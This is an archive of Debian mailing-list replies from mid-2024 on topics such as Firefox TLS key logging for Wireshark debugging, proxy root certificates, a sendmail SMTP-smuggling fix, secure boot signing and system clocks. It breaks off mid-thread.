Re: how2 format a flash drive

[Jeffrey Walton]

On Tue, Jul 2, 2024 at 3:53 AM George at Clug  wrote:
>
> Is telemetry evil?  Are guns evil?  Philosophical questions?
>
> I find it objectionable when people gather "telemetry" about "me" and not 
> just the causes of the "blue screens of death".
>
> I find it objectionable when people gather personal "telemetry" and then on 
> sell that information to others for whatever purposes, whether it is to 
> target me with ads, or political analysts like Cambridge Analytica, or to 
> alter my "Social Credit Score", or to be used to cancel my Credit Cards, or 
> for whatever other purpose.

For those interested in reading more, pick up a copy of Shoshana
Zuboff's book The Age of Surveillance Capitalism: The Fight for a
Human Future at the New Frontier of Power
( and
).

Jeff

Re: How to use Wine, How to get Gecko to install and work

[Jeffrey Walton]

On Mon, Jul 1, 2024 at 6:33 PM George at Clug  wrote:
>
> To all who replied, Thanks.
>
> Sadly after further testing I still have very little success with Wine.
>
> When I installed WineHQ's Wine Installation, Gecko and Mono were able to be 
> installed. I noticed a rpcss.exe (from memory) in Taskmgr. This at least 
> allowed me to display the initial web page in Wine's Iexplore. But sadly it 
> did not help me in successfully  installing the current Windows versions of 
> Firefox or Chrome, or other programs I was having challenges with.
>
> I also tried PlayOnLinux without any success.
>
> The "Time vs ROI" for this endeavour suggests to me, that for now, I should 
> just use Linux native programs.

I think this is probably wandering off-topic, but I'll toss it out there...

When in Rome, do as the Romans do. That means you run Windows programs
on WIndows VMs, and Linux programs on Linux VMs. Don't try to use Wine
to run Windows programs on Linux; and don't try to use a POSIX
subsystem to run Linux programs on WIndows. Mixing and matching is not
worth the aggravation.

You never stated what problem you are trying to solve. I'm guessing
there's a native Linux replacement for it so you don't need to wine
and iexplore.

Jeff

Re: how2 format a flash drive

[Jeffrey Walton]

On Sat, Jun 29, 2024 at 4:13 PM Lee  wrote:
>
> On Tue, Jun 25, 2024 at 7:26 PM George wrote:
> > [...]
> > If you have any grips or difficulties, please mention them.
>
> My gripes and difficulties are the same thing. [...]
> something equivalent to notepad++,

You might give Notepadqq a spin. I've used it in the past, and it has
a comparable look and feel to Notepad++.

.

If TAB works kind of funny, then see this bug report and fix:
.
(I don't know if it was merged).

Jeff

Re: Browser traffic interception/inspection (was: how2 format a flash drive)

[Jeffrey Walton]

On Sun, Jun 30, 2024 at 9:46 PM Jeffrey Walton  wrote:
>
> On Sun, Jun 30, 2024 at 9:35 PM Lee  wrote:
> >[...]
> >   ... which is the downside of free software.  Technically, yes, I'm
> > free to build the software with whatever I want enabled, with whatever
> > changes I want added/deleted.
> > In practice, my ability to build Firefox is .. lacking :(
>
> Yeah, trying to build some of these projects is the pits.

One way out of this may be to make a Request for Packaging,
<https://wiki.debian.org/RFP>. Ask for debug builds of Firefox.

Since Debian is now supplying release builds in their release channel,
it might make sense for Debian to provide debug builds for web
developers. Web developers can install firefox-debug as a www-browser
alternative, and do things like debug protocol issues. Regular users
would still get the release version of Firefox, so regular users would
be protected from some of the security problems associated with the
debug build.

And you still might try the nightly build of Firefox, and see if it
provides the features that you are looking for. If the nightly build
has what you need, then you won't have to spend time on the RFP.

Jeff

Re: Browser traffic interception/inspection (was: how2 format a flash drive)

[Jeffrey Walton]

On Sun, Jun 30, 2024 at 9:35 PM Lee  wrote:
>
> On Sat, Jun 29, 2024 at 4:45 PM Jeffrey Walton wrote:
> >
> > On Sat, Jun 29, 2024 at 4:13 PM Lee wrote:
> > >
> > > [...] Debian firefox does NOT allow one to do
> > > TLS intercept - ie. this does not work:
> > > C:\UTIL>cat firefox-tlsdecode.bat
> > > set SSLKEYLOGFILE=C:\Users\Lee\AppData\Local\Temp\FF-SSLkeys.txt
> > > start C:\"Program Files\Firefox\Firefox.exe"
> > >
> > > @rem wireshark:
> > > @rem   edit / preferences
> > > @rem   protocols / tls  (v2.6: protocols / ssl)
> > > @rem paste SSLKEYLOGFILE filename into (Pre)-Master-Secret log
> > > filename (was SSL debug file entry)
> >
> > I'm not sure who your complaint is against -- Debian, Firefox or
> > Linux. I'm also not sure that it is a valid complaint.
>
> It is 100% a valid complaint.  And it's a complaint against Debian
> because they're the ones that turned off that functionality.
> They have , I disagree, I'm free to build Firefox for myself,
> get somebody else to doit for me, or get it somewhere else.

It looks like the change is due to NSS (Network Security Services),
not Firefox: <https://bugzilla.mozilla.org/show_bug.cgi?id=908046> and
<https://bugzilla.mozilla.org/show_bug.cgi?id=1183318>. I think the
3318 bug is most relevant, but I may be mistaken.

If I am parsing the various bug reports properly, it looks like
SSLKEYLOGFILE was disabled by default for release builds. It looks
like you might have to perform your own debug build to gain access
again. Or maybe the nightly builds of Firefox will have it.

>   ... which is the downside of free software.  Technically, yes, I'm
> free to build the software with whatever I want enabled, with whatever
> changes I want added/deleted.
> In practice, my ability to build Firefox is .. lacking :(

Yeah, trying to build some of these projects is the pits.

Jeff

Re: sendmail and starttls failing

[Jeffrey Walton]

On Sun, Jun 30, 2024 at 6:13 PM Greg Wooledge  wrote:
>
> On Sun, Jun 30, 2024 at 23:08:01 +0100, Tim Woodall wrote:
> > According to this
> > https://support.trustwave.com/kb/KnowledgebaseArticle10016.aspx
> >
> > bare CRs aren't allowed in emails but this has always worked.
> >
> > I'm only likely to have cron generating emails like this.
> >
> > Strange that this would have been changed in a stable release. It
> > doesn't seem to have been a security update.
>
> It looks like it's coming from this change:
>
> https://metadata.ftp-master.debian.org/changelogs//main/s/sendmail/sendmail_8.17.1.9-2+deb12u2_changelog
>
>   * Fix CVE-2023-51765 (Closes: #1059386):
> sendmail allowed SMTP smuggling in certain configurations.
> Remote attackers can use a published exploitation
> technique to inject e-mail messages with a spoofed
> MAIL FROM address, allowing bypass of an SPF protection
> mechanism. This occurs because sendmail supports
> . but some other popular e-mail servers
> do not. This is resolved with 'o' in srv_features.
>
> I don't know the details of how this leads to a security hole.

Take a look at the blog at
.

Jeff

Re: sendmail and starttls failing

[Jeffrey Walton]

On Sun, Jun 30, 2024 at 6:08 PM Tim Woodall  wrote:
>
> On Sun, 30 Jun 2024, Tim Woodall wrote:
>
> > On Sun, 30 Jun 2024, Michael Grant wrote:
> >
> >> After an update today, sendmail is refusing to accept mail.  I'm
> >> seeing this in the logs:
> >>
> >
> > Hmmm, this update seems to have done a lot of odd things.
> >
>
> root@dirac:~# mail root
> Cc:
> Subject: test cr
> this
> is^Ma test
> .
> root@dirac:~# mailq
> MSP Queue status...
>  /var/spool/mqueue-client (1 request)
> -Q-ID- --Size-- -Q-Time- 
> Sender/Recipient---
> 45ULV1xk014043   15 Sun Jun 30 22:31 r...@dirac.home.woodall.me.uk
>   (Deferred: 421 4.5.0 Bare carriage return (CR) not allowed)
>   root
>  Total requests: 1
> MTA Queue status...
> /var/spool/mqueue is empty
>  Total requests: 0
>
> According to this
> https://support.trustwave.com/kb/KnowledgebaseArticle10016.aspx
>
> bare CRs aren't allowed in emails but this has always worked.
>
> I'm only likely to have cron generating emails like this.
>
> Strange that this would have been changed in a stable release. It
> doesn't seem to have been a security update.

New SMTP smuggling attack,
.

The short of it is, non-conforming emails and sloppy parsing have led
to a litany of problems including mail spoofing. It has been going on
for years, but now things are changing.

Jeff

Re: Browser traffic interception/inspection

[Jeffrey Walton]

On Sat, Jun 29, 2024 at 9:37 PM Max Nikulin  wrote:
>
> On 30/06/2024 03:45, Jeffrey Walton wrote:
> > On Sat, Jun 29, 2024 at 4:13 PM Lee wrote:
> >>
> >> [...] Debian firefox does NOT allow one to do
> >> TLS intercept - ie. this does not work:
> >> C:\UTIL>cat firefox-tlsdecode.bat
> >> set SSLKEYLOGFILE=C:\Users\Lee\AppData\Local\Temp\FF-SSLkeys.txt
> >> start C:\"Program Files\Firefox\Firefox.exe"
> [...]
> > I'm not sure who your complaint is against -- Debian, Firefox or
> > Linux. I'm also not sure that it is a valid complaint.
>
> I do not mind to see a link stating that the appropriate logger is
> really disabled. Certainly dumping of TLS session keys may be disabled
> through a compile time flag similar to enforcing signatures for add-ons.
> It may be default Firefox configuration for release builds or some line
> in Debian build rules. It still might be some mistake during attempts to
> enable the logger. I have read about this approach but I have never
> tried it in action.
>
> > Firefox uses its own certificate store.
>
> It is relevant to active traffic interception you described (a proxy).
> Lee prefers passive traffic sniffing and it requires cooperation from a
> peer to get session keys. Each case has its own advantages.

As far as I know, the browsers support active interception. That is,
"interception is a valid use case" for the browsers to support
Dataloss Prevention (DLP) programs. The browsers do that through the
use of interception proxies and root CA's used in the DLP program.

Browsers do not support the passive capture/replay that OP wants. That
is, they don't support exporting the premaster secret or the derived
master secret.

The browsers use tortured logic to arrive at "interception is a valid
use case". They hang it off of the W3C's Design Principles and
Priorities of Constituencies. The browser's argument goes as such: if
a user did not want to be intercepted, then the CA certificate used
for interception would not be present in the certificate store. Since
the proxy's interception certificate is present in the store, the user
wants to be intercepted. (You can't make this shit up).

A corollary to "interception is a valid use case" is, webapps can
never be sure they have a secure channel. Therefore, webapps can only
handle low value data. Higher value data should be handled by hybrid
and native apps.

> At first it was not clear to me that having TLS private key (copied from
> the server) is not enough for passive traffic decryption. Diffie-Hellman
> key exchange scheme allows to generate secret keys even over public
> channel...

Correct. You also need ClientHello.random and ServerHello.random since
the master secret is computed from
(https://datatracker.ietf.org/doc/html/rfc5246#section-8.1):

  master_secret = PRF(pre_master_secret, "master secret",
  ClientHello.random + ServerHello.random)
  [0..47];

Something some folks don't realize is, ClientHello.random and
ServerHello.random are also used for key transport schemes like RSA,
when the client encrypts the premaster secret and sends it to the
server. The ClientHello.random and ServerHello.random are present to
ensure both sides contribute to the master secret. Otherwise, only the
client would contribute to the master secret in a key transport
scheme.

> The main purpose of TLS certificates (public keys in the
> browser or system store) is to confirm that there is no attacker in
> between that blocks packets from the client and establishes its own
> connection to the server.

No, not quite. Interception is a valid use case under the browser's
security model.

You can achieve what you are getting at, but you need to use hybrid
and native apps that practice host public key pinning. You need hybrid
and native apps because they can usually obtain the host's public key.
But the browsers don't expose the host public key to the webapp. So
webapps have no way to perform pinning. You can't even get the public
key from a WebSocket.

> Encryption of email messages using a public
> key is a different case. Session keys are required to debug TLS
> applications.

Email transport security is an absolute mess due to opportunistic
encryption and smart hosts. About the best you can do is, encrypt and
sign the message, and send it over an insecure channel.

Jeff

Browser traffic interception/inspection (was: how2 format a flash drive)

[Jeffrey Walton]

On Sat, Jun 29, 2024 at 4:13 PM Lee  wrote:
>
> [...] Debian firefox does NOT allow one to do
> TLS intercept - ie. this does not work:
> C:\UTIL>cat firefox-tlsdecode.bat
> set SSLKEYLOGFILE=C:\Users\Lee\AppData\Local\Temp\FF-SSLkeys.txt
> start C:\"Program Files\Firefox\Firefox.exe"
>
> @rem wireshark:
> @rem   edit / preferences
> @rem   protocols / tls  (v2.6: protocols / ssl)
> @rem paste SSLKEYLOGFILE filename into (Pre)-Master-Secret log
> filename (was SSL debug file entry)

I'm not sure who your complaint is against -- Debian, Firefox or
Linux. I'm also not sure that it is a valid complaint.

Firefox uses its own certificate store. If you want to proxy your
traffic, then the proxy's root cert needs to be in Mozilla's
certificate store. See
.

Chrome is different. Chrome uses the Windows store by default, but
also has its own certificate store. For Chrome, your Windows admin can
make a change with a Group Policy, and Chrome will pick it up through
the Windows certificate store. Or you can manually install the proxy's
root cert. See 
.

Debian is not concerned about TLS interception in this case. But for
completeness, Debian has its own store at /etc/ssl/certs. You get the
certificates by installing the ca-certificates package. You can
install certificates into the store by dropping the root cert on the
filesystem at /usr/local/share/ca-certificates, and then running
update-ca-certificates. See
 and
.

When you are intercepting/inspecting traffic, you typically setup your
proxy, and then proxy Firefox and Chrome traffic through your proxy.
The proxy can run on your local machine, like 127.0.0.1. Your proxy's
root certificate should be in the browser's store (as described
above).

Jeff

Re: balenaEtcher

[Jeffrey Walton]

On Fri, Jun 28, 2024 at 5:16 PM Stefan Monnier  wrote:
>
> > I’ve been tryed to boot a flash usb of 4Gb with
> > balenaEtcher-1.19.-21-x64.AppImage and Parrot-home-4.4_i386.iso and gives
> > me the Error:(0, h.requestMetadata) is not a function
>
> Who/what gives you this error?  When does it give you this error?
>
> Have you tried to ask your favorite search engine about
> "Error:(0, h.requestMetadata) is not a function"?

It looks like a question about Parrot OS.

Maybe it is more appropriate for .

Jeff

Re: About dash as sh

[Jeffrey Walton]

On Mon, Jun 24, 2024 at 2:16 AM Nicolas George  wrote:
>
> Stefan Monnier (12024-06-21):
> > And if it's not a tty, you get some kind of Undefined Behavior?
>
> Knowing that “undefined behavior” is just an expression invented by C
> standards authors to make “we make no guarantee about it, use it at your
> own risk” sound more scary, I do not think it is a severe problem.

Do shells suffer UB? I always thought that was a C thing.

When I encounter UB in C, I drop into inline assembler since asm does
not suffer C's undefined behavior.

Jeff

Re: System time/timezone, was Re: Maximum size .bash_aliases file

[Jeffrey Walton]

On Fri, Jun 21, 2024 at 12:18 AM David Wright  wrote:
> [...]
> Well, that's a mouthful. And what am I to call the time that a system
> issues using that system default time zone?

The kernel clock counts ticks. The ticks are relative to Epoch, which
is UTC. Ticks are what you see in the output of dmesg. So maybe call
it UTC, GMT or Zulu?

> If I boot up two computers
> and they display different times, what term is appropriate in your
> opinion to describe the time displayed?

The NTP folks call them timekeepers when they are correct, and
falsetickers when they are incorrect. But "them" are timeservers
participating in the NTP protocol. See
 and RFC 5905,
.

If the OS is not keeping accurate time, then I would call it a falseticker.

If you only boot two computers, then you cannot be sure which computer
is the falseticker. You need three or more time sources to determine
which is the falseticker. As the saying goes, a person with a watch
knows what time it is. A person with two watches is never sure.

Jeff

Re: mounting external hard drive from rescue mode shell?

[Jeffrey Walton]

On Sat, Jun 22, 2024 at 10:48 AM Richard Owlett  wrote:
> [...]
> Thank you for reminding me of live images just now. Perfect timing.
> I have an i386 machine with some atypical constraints.
> https://www.debian.org/CD/live/ states only amd64 images are currently
> available.
>
> Questions:
>1. What is latest i386 live image available in some archive?
>2. I have a working machine that will take a current full install
>   of an i386 system. Can an average user create his own i386 live
>   install image?

According to :

We don't store/serve the full set of ISO images for all
architectures, to reduce the amount of space taken up on the mirrors.
You can use the jigdo tool to recreate the missing ISO images instead.

The link provided for the jigdo tool is
.

Jeff

Re: Modifying Desktop Icons

[Jeffrey Walton]

On Tue, Jun 18, 2024 at 12:23 AM Gareth Evans  wrote:
>
> On 17 Jun 2024, at 20:45, Pranjal Singh  wrote:
>
> I am trying to modify the Firefox desktop icon so that it opens
> an incognito window by default.
> ...
>
> - Exec=firefox %u
> + Exec=firefox -private-window %u
>
> Assuming that's not a typo, please try:
>
> --private-window
>
> (NB two hyphens at the beginning)
>
> This works for me on Mate.

According to Mozilla documentation at
, it is one
hyphen, not two.

Jeff

Re: suggestion of upgrade to 12

[Jeffrey Walton]

On Thu, Jun 20, 2024 at 10:08 AM Richard  wrote:
>
> The question with Linux isn't if there's a need to update to the latest 
> version (of the distro) like on Windows, but rather what's keeping you from 
> updating? If there's no urgent reason to stick to 11, update. 11 is now 
> oldstable and will become oldoldstable mid next year. Thus, it currently 
> becomes fewer updates - no idea how the situation is with security updates 
> compared to stable. 10 reaches end of life in about a month or so. So that's 
> the timetable you'll need to keep in mind. Of course, right now there isn't 
> anything forcing you to update, you merely need to update within the next two 
> years to keep getting updates. But chances are very low with more 
> conservative distros like Debian that upgrading will have more drawbacks than 
> benefits. Of course it can always be a smart choice to wait for the first one 
> or two dot releases, as they will fix issues previously unnoticed or where 
> the fix wasn't ready on time. But that's all.

One additional data point to consider... there are folks who have
exploits written for vulnerabilities that the community does not know
about.

Generally speaking, the older the software, the more exploits are
available. Developers generally don't work on old versions of their
software. Instead, they fix some things, release a new version and
move on. The only chance to fix the vulnerability is move to a newer
version of the software by building it yourself or using the latest
distro release.

Folks who deal in vulnerabilities and exploits adore the old software
because nothing gets fixed, so their exploits continue to work on old
versions of software. As Greg Kroah-Hartman noted: [1]

We have a very bad history of keeping bugs alive for a long time.
Somebody did a check of it, most known bugs live for five years in
systems. These are things that people know and know how to exploit.
They’re not closed. That’s a problem in our infrastructure...

CVE tracking is not the answer because that assumes every exploitable
bug is tagged with a CVE. There are lots of bugs out there that are
not tracked with a CVE, yet are exploitable. See, for example, the
TTY1 layer bug discussed in [1]. It took over 3 years to figure out it
was exploitable and for the patches to be backported.

(I have first hand knowledge of how one firm operates. The firm sells
their exploits to Northrop Grumman Electronic Warfare Division.)

[1] 
https://thenewstack.io/design-system-can-update-greg-kroah-hartman-linux-security/

Jeff

> Am Do., 20. Juni 2024 um 09:58 Uhr schrieb Jeff Peng :
>>
>> I am running a small mailserver with debian 11 for many years. It's
>> quite solid.
>> Though I have read this article:
>> https://www.cherryservers.com/blog/debian-12-bookworm-release
>> do you think there is any need for me to upgrade from 11 to 12?
>> just for the newer software like postfix, dovecot?
>>
>> Thanks.

Re: UEFI secure boot issue

[Jeffrey Walton]

On Thu, Jun 20, 2024 at 9:23 AM Bhasker C V  wrote:
>
> I generated a pr/pk pair and the kernel is signed. Placed them in the
> kernel tree and compiled the kernel.

I don't think you are supposed to check-in/compile-in the private key.
It is usually supposed to stay private.

> Could someone tell me what am I doing wrong please ?
>
> Below is the status (I am using loader.efi from linuxfoundation)
> When i boot debian stock kernel signed, i see that the secure boot
> gets enabled (hence bios and everything else seems to be fine with the
> same UEFI loader).
> However, when I boot the compiled kernel I get
>
> $ dmesg | grep -i secure
> [0.007085] Secure boot could not be determined
>
>
> $ sbverify --list bootx64.efi
> warning: data remaining[91472 vs 101160]: gaps between PE/COFF sections?
> signature 1
> image signature issuers:
>  - /C=US/ST=Washington/L=Redmond/O=Microsoft Corporation/CN=Microsoft
> Corporation UEFI CA 2011
> image signature certificates:
>  - subject: /C=US/ST=Washington/L=Redmond/O=Microsoft
> Corporation/OU=MOPR/CN=Microsoft Windows UEFI Driver Publisher
>issuer:  /C=US/ST=Washington/L=Redmond/O=Microsoft
> Corporation/CN=Microsoft Corporation UEFI CA 2011
>  - subject: /C=US/ST=Washington/L=Redmond/O=Microsoft
> Corporation/CN=Microsoft Corporation UEFI CA 2011
>issuer:  /C=US/ST=Washington/L=Redmond/O=Microsoft
> Corporation/CN=Microsoft Corporation Third Party Marketplace Root
> $ sbverify  --list ./loader.efi
> signature 1
> image signature issuers:
>  - /C=GB/ST=England/L=London/O=BHASKER/CN=bcvm.bcvm.bcv
> image signature certificates:
>  - subject: /C=GB/ST=England/L=London/O=BHASKER/CN=bcvm.bcvm.bcv
>issuer:  /C=GB/ST=England/L=London/O=BHASKER/CN=bcvm.bcvm.bcv
> $ sbverify  --list ../../linux/k.bcv
> signature 1
> image signature issuers:
>  - /C=GB/ST=England/L=London/O=BHASKER/CN=bcvm.bcvm.bcv
> image signature certificates:
>  - subject: /C=GB/ST=England/L=London/O=BHASKER/CN=bcvm.bcvm.bcv
>issuer:  /C=GB/ST=England/L=London/O=BHASKER/CN=bcvm.bcvm.bcv


Have a look at , and the use of
the Machine Owner Key (MOK).

Jeff

Re: System time/timezone, was Re: Maximum size .bash_aliases file

[Jeffrey Walton]

On Thu, Jun 20, 2024 at 12:52 AM  wrote:
>
> On Wed, Jun 19, 2024 at 01:01:44PM -0400, Jeffrey Walton wrote:
> > On Wed, Jun 19, 2024 at 7:09 AM Greg Wooledge  wrote:
>
> [...]
>
> > > I strongly disagree.  The system clock is kept on "epoch time", which
> > > is the number of seconds since midnight, January 1, 1970 UTC.
> > >
> > > The system clock doesn't have a time zone of its own.  It just gets
> > > converted to a time and date within any given time zone on demand.
> >
> > ++.
> >
> > The sharp edge is how the RTC clock is set - UTC or localtime. Also
> > see <https://wiki.debian.org/DateTime>.
>
> Please don't mix those three things, that makes them just more confusing.
>
> The original topic was the system's time zone. This hasn't anything
> to do with the RTC clock, and only peripherally with "the system's
> time zone" (of which some, me included, say "there's no such thing",
> and others disagree :)
>
> You have
>
>  - the RTC clock. This is *only* looked at at boot time, to init
>the system clock (and when you, as an admin, do "hwclock").
>During those operations, it's important to know which timezone
>the RTC is in, since this one /is/ in "human format. It was
>intended to be read and set by humans, like your kitchen clock,
>back then.
>
>  - the system clock: it boringly counts seconds. Since Epoch.
>Since it has't hours or minutes, let alone weeks or months,
>time zones don't even make sense to it. Sometimes it does
>a leap second, but experts are torn on whether this was a
>good idea at all. Have a look at [1] for an entrance to yet
>another deep time rabbit hole.
>
>  - timezones and stuff: those happen whenever you want to convert
>the system clock to hours, minutes, days, and other human
>related stuff and back.
>
> (if you have good net connectivity, reading the RTC at boot can
> be shunned completely, you don't need it anymore).

Don't forget boottime and the delta between boottime and the monotonic
clock. You'll need them to explain this:

$ TZ=America/New_York dmesg -T | head -1
[Wed Jun 19 01:50:14 2024] Linux version 6.9.4-200.fc40.x86_64 (mockbuild@d372fa
1a67e347178b7bd422ead09b96) (gcc (GCC) 14.1.1 20240607 (Red Hat 14.1.1-5), GNU l
d version 2.41-37.fc40) #1 SMP PREEMPT_DYNAMIC Wed Jun 12 13:33:34 UTC 2024

$ TZ=America/California dmesg -T | head -1
[Wed Jun 19 05:50:14 2024] Linux version 6.9.4-200.fc40.x86_64 (mockbuild@d372fa
1a67e347178b7bd422ead09b96) (gcc (GCC) 14.1.1 20240607 (Red Hat 14.1.1-5), GNU l
d version 2.41-37.fc40) #1 SMP PREEMPT_DYNAMIC Wed Jun 12 13:33:34 UTC 2024

> Please, keep those three at a safe distance

I'm not sure how you can disgorge them given they contribute to a
human readable time.

Jeff

Re: System time/timezone, was Re: Maximum size .bash_aliases file

[Jeffrey Walton]

On Wed, Jun 19, 2024 at 7:09 AM Greg Wooledge  wrote:
>
> On Tue, Jun 18, 2024 at 23:09:04 -0500, David Wright wrote:
> > On Tue 18 Jun 2024 at 07:07:36 (-0400), Greg Wooledge wrote:
> > > On Mon, Jun 17, 2024 at 23:54:03 -0500, David Wright wrote:
> > > > What should I call the timezone of my computer when it's booted up and
> > > > no users are logged in?
> > >
> > > Daemons will almost always use the system's default time zone (the one
> > > specified by /etc/localtime or /etc/timezone).
> > >
> > > It's *theoretically* possible for some daemons to be configured to use
> > > a different time zone, or to be hard-coded to use UTC.  I've never seen
> > > this, but it could be done.
> >
> > In view of that, I think it's reasonable to drop the "default",
> > and go with "system time zone", ie the time zone that the system
> > clock it set to.
>
> I strongly disagree.  The system clock is kept on "epoch time", which
> is the number of seconds since midnight, January 1, 1970 UTC.
>
> The system clock doesn't have a time zone of its own.  It just gets
> converted to a time and date within any given time zone on demand.

++.

The sharp edge is how the RTC clock is set - UTC or localtime. Also
see .

Jeff

Re: System time/timezone, was Re: Maximum size .bash_aliases file

[Jeffrey Walton]

On Tue, Jun 18, 2024 at 4:05 AM  wrote:
> On Mon, Jun 17, 2024 at 11:54:03PM -0500, David Wright wrote:
> > [...]
> >   $ date; timedatectl status
> >   Mon Jun 17 23:51:43 CDT 2024
> >  Local time: Tue 2024-06-18 04:51:43 UTC
> >  Universal time: Tue 2024-06-18 04:51:43 UTC
> >RTC time: Tue 2024-06-18 04:51:43
> >   Time zone: Etc/UTC (UTC, +)
> >   System clock synchronized: yes
> > NTP service: active
> > RTC in local TZ: no
> >   $
> >
> > I notice that   man timedatectl   says:
> >
> >set-timezone [TIMEZONE]
> >Set the system time zone to the specified value.
> >Available timezones can be listed with list-timezones.
> >If the RTC is configured to be in the local time, this
> >will also update the RTC time. This call will alter
> >the /etc/localtime symlink. See localtime(5) for more
> >information.
>
> I cringe a bit when I see that.

Yeah.. on Linux, it is recommended to keep the RTC clock in UTC.
Unless Windows has contaminated the machine. See
.

Jeff

Re: Upgrading Buster LTS (10) to Bookworm (current stable) concerns

[Jeffrey Walton]

On Mon, Jun 17, 2024 at 3:38 AM Nick Sal  wrote:
>
> I plan to upgrade a server running Buster to Bookworm.
> Server is running: {web,mail} servers, mysql and postregre, docker, ssh, 
> ldap, ferm (firewall), and few other non-critical services.
>
> I'd like to appeal to your experience for a couple concerns:
>
> 1) Should I upgrade in two steps from Buster to Bullseye (oldstable), and 
> then to Bookworm? Or should I go directly from Buster to Bookworm in one step?
> The upgrade will be done by changing sources.list

If I recall correctly, simply changing sources.list is not
recommended. That's because there are post-upgrade scripts that should
be run to finalize a configuration on occasion.

You should follow
,

and friends.

> 2) To the best of your knowledge, do docker images break between such 
> upgrades? Unfortunately, I don't have many details on docker because it was 
> set-up by a previous admin.
>
> If any big break/incompatibility comes to mind for the above services, please 
> don't hesitate to share your story :)

Jeff

Re: Bluetooth/SSH issue

[Jeffrey Walton]

On Sun, Jun 16, 2024 at 10:33 PM George at Clug  wrote:
>
> Rayan,
>
> On Monday, 17-06-2024 at 09:18 Ryan Nowakowski wrote:
> > On Sun, Jun 16, 2024 at 02:30:32PM -0600, Charles Curley wrote:
> > > On one of my machines, I have some interesting interference. Bluetooth
> > > works just fine, and so does networking. Bluetooth is normally disabled.
> > > However, when I have Bluetooth turned on (and after I turn it off), SSH
> > > is *slow*.
> > > Is there some sort of cross-talk issue?
> >
> > Sometimes Bluetooth and Wi-Fi share the same radio.  Are you running ssh 
> > over Wi-Fi?  Try running ssh over Ethernet while using Bluetooth.  Is ssh 
> > still slow?
>
> What do you mean by "Bluetooth and Wi-Fi share the same radio" ?
>
> In the early days of Windows 8 Tablet and laptop devices, I noticed that the 
> bluetooth mouse would move jerkily while a large download was happening over 
> Wi-Fi. Many people had this issue, and it was so annoying it lead me to tell 
> people not to use bluetooth mice.
>
> You comment might explain why this problem existed, though I am still not 
> sure what "share the same radio" actually means?

Both Wifi and Bluetooth use the globally unlicensed Industrial,
Scientific and Medical (ISM) 2.4 GHz short-range radio frequency band.

You can buy combo chips for the application. See, for example,
Qualcomm's QCA9377,
.

Jeff

Re: Package libllvm12:i386 does not exists on Debian ?

[Jeffrey Walton]

On Sun, Jun 16, 2024 at 12:48 PM Mario Marietto  wrote:
>
> Hello to everyone.
>
> I'm trying to compile wine-tkg from this repo :
>
> https://github.com/Frogging-Family/wine-tkg-git
>
> This is what I did,according with the short tutorial :
>
> root@debian-now:/home/marietto/Scaricati/wine-tkg-git/wine-tkg-git# 
> ./non-makepkg-build.sh
>
> => Installing package: libllvm12:i386 | Using apt
> E: Can't find package libllvm12:i386
> ==> WARNING: Failed to install package: libllvm12:i386
> => Installing apt-smart | Using pip
> error: externally-managed-environment
> × This environment is externally managed
> ╰─> To install Python packages system-wide, try apt install
> python3-xyz, where xyz is the package you are trying to
> install.
>
> If you wish to install a non-Debian-packaged Python package,
> create a virtual environment using python3 -m venv path/to/venv.
>
> Then use path/to/venv/bin/python and path/to/venv/bin/pip. Make sure you have 
> python3-full installed.
> If you wish to install a non-Debian packaged Python application,it may be 
> easiest to use pipx install xyz, which will manage a virtual environment for 
> you. Make sure you have pipx installed.
>
> See /usr/share/doc/python3.11/README.venv for more information.
>
> note: If you believe this is a mistake, please contact your Python 
> installation or OS distribution provider. You can override this, at the risk 
> of breaking your Python installation or OS, by passing 
> --break-system-packages.
> hint: See PEP 668 for the detailed specification.
>
> ==> WARNING: Failed to install apt-smart, cannot update mirror.
> => Installing apt-smart | Using pip| Attempt: 2/3
> error: externally-managed-environment
> × This environment is externally managed
> ╰─> To install Python packages system-wide, try apt install
> python3-xyz, where xyz is the package you are trying to
> install.
>
> If you wish to install a non-Debian-packaged Python package,
> create a virtual environment using python3 -m venv path/to/venv.
>
> Then use path/to/venv/bin/python and path/to/venv/bin/pip. Make sure you have 
> python3-full installed.
> If you wish to install a non-Debian packaged Python application,it may be 
> easiest to use pipx install xyz, which will manage a virtual environment for 
> you. Make sure you have pipx installed.
>
> See /usr/share/doc/python3.11/README.venv for more information.
>
> note: If you believe this is a mistake, please contact your Python 
> installation or OS distribution provider. You can override this, at the risk 
> of breaking your Python installation or OS, by passing 
> --break-system-packages.
> hint: See PEP 668 for the detailed specification.
>
> ==> WARNING: Failed to install apt-smart, cannot update mirror.
> => Installing apt-smart | Using pip| Attempt: 3/3
> error: externally-managed-environment
> × This environment is externally managed
> ╰─> To install Python packages system-wide, try apt install
> python3-xyz, where xyz is the package you are trying to
> install.
>
> If you wish to install a non-Debian-packaged Python package,
> create a virtual environment using python3 -m venv path/to/venv.
>
> Then use path/to/venv/bin/python and path/to/venv/bin/pip. Make sure you have 
> python3-full installed.
>
> If you wish to install a non-Debian packaged Python application,it may be 
> easiest to use pipx install xyz, which will manage a virtual environment for 
> you. Make sure you have pipx installed.
>
> See /usr/share/doc/python3.11/README.venv for more information.
>
> note: If you believe this is a mistake, please contact your Python 
> installation or OS distribution provider. You can override this, at the risk 
> of breaking your Python installation or OS, by passing 
> --break-system-packages.
> hint: See PEP 668 for the detailed specification.
> ==> WARNING: Failed to install apt-smart, cannot update mirror.
> ===> ERROR: Failed to update mirror after 3 attempts.
> => Installing package: libllvm12:i386 | Using apt| Attempt: 2/3
> E: Can't find package libllvm12:i386
> ==> WARNING: Failed to install package: libllvm12:i386
> => Installing apt-smart | Using pip
> error: externally-managed-environment
> × This environment is externally managed
> ╰─> To install Python packages system-wide, try apt install
> python3-xyz, where xyz is the package you are trying to
> install.
>
> If you wish to install a non-Debian-packaged Python package,
> create a virtual environment using python3 -m venv path/to/venv.
>
> Then use path/to/venv/bin/python and path/to/venv/bin/pip. Make sure you have 
> python3-full installed.
> If you wish to install a non-Debian packaged Python application,it may be 
> easiest to use pipx install xyz, which will manage a virtual environment for 
> you. Make sure you have pipx installed.
>
> See /usr/share/doc/python3.11/README.venv for more information.
>
> note: If you believe this is a mistake, please contact your Python 
> installation or OS distribution provider. You can override this, at the risk 

Re: can't connect to server from outside LAN

[Jeffrey Walton]

On Wed, Jun 12, 2024 at 10:33 PM Greg Marks  wrote:
>
> I'm running a Debian server from my home with a static IP address,
> with ssh configured to use key-based authentication rather than
> password-based.  As of a couple weeks ago, I have been unable to ssh to
> my server from external locations.  When I ssh from a laptop connected
> to the wireless network on the same router as my home server, I do
> successfully connect to the server.  But when I ssh from an external
> location, I get this error:
>
>[...]
> The problem began a couple weeks ago; previously (and for many years)
